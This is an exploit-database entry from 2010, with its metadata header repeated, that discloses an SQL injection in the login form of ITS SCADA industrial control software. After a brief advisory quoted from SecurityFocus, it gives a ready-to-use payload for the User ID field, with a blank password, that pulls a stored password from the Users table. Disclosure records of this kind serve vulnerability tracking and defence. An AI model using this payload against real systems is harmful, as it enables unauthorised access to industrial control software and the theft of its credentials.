ITS SCADA - 'Username' SQL Injection
| EKU-ID: 39477 | CVE: | OSVDB-ID: |
| Author: Eugene Salov | Published: 2010-10-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 39477 | CVE: | OSVDB-ID: |
| Author: Eugene Salov | Published: 2010-10-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/43680/info ITS SCADA is prone to an SQL-injection vulnerability. Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. User ID = 1' or 1=(select top 1 password from Users)-- Password = blank